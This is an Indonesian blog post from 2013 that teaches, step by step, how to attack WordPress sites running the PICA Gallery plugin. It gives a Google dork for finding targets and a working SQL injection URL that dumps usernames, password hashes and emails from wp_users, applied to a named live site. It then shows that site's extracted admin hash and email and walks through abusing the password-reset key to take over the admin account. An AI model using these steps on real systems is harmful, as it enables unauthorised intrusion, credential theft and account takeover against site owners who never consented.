Minggu, 17 Februari 2013

Wordpress PICA Gallery-Sql Injection

Kali ini ngebahas tentang Exploit PICA Gallery Sql Injection untuk Wordpress Belakangan ini banyak sekali orang yang menggunakan exploit ini untuk attacking ke Wordpress. Langsung saja..

Dork: intext :"Powered by Apptha." inurl:gallery 

Pastekan dork tadi ke google.

Target telah dipilih. Contoh
http://tecnicoafinador.com/pica-gallery/
ubah menjadi
http://tecnicoafinador.com/pica-gallery/?aid=-1+union+select+concat(user_login,0x3a,user_pass,0x3a,user_email),2,3,4+from+wp_users--

maka akan muncul seperti dibawah ini
admin:$P$BFCNIAKxW3xeD2QC6r90mguO.46en/0:tecnicoafinador@hotmail.com

Langkah selanjut nya yaitu mendapatkan user activation key nya. Buka page login web terserbut
http://tecnicoafinador.com/wp-login.php pilih forgot password, masukan user login dibagian forgot password kemudian pilih Get New Password




Fungsinya untuk memunculkan user activation key,

maka akan muncul seperti ini admin:XilxSnQIqhUY8iAbGA50:tecnicoafinador@hotmail.com
 setelah mendapatkan user activation key, lalu kita buka lagi page login web tadi.
http://tecnicoafinador.com/wp-login.php
ubah menjadi
http://tecnicoafinador.com/wp-login.php?action=rp&key=(user activation)&login=(user login)
maka akan seperti ini
http://tecnicoafinador.com/wp-login.php?action=rp&key=XilxSnQIqhUY8iAbGA50&login=admin

maka akan muncul seperti ini, halaman ini meminta reset password yang baru, isikan password sesuka hati, kemudian klik Reset Password


 Setelah mereset password baru, login ke web tersebut dengan user tadi dan password yang telah di reset.
Maka akan masuk ke page admin.

Setelah masuk ke page admin silahkan anda ingin melakukan apa.



Posting Lebih Baru Posting Lama Beranda

0 Komentar:

Posting Komentar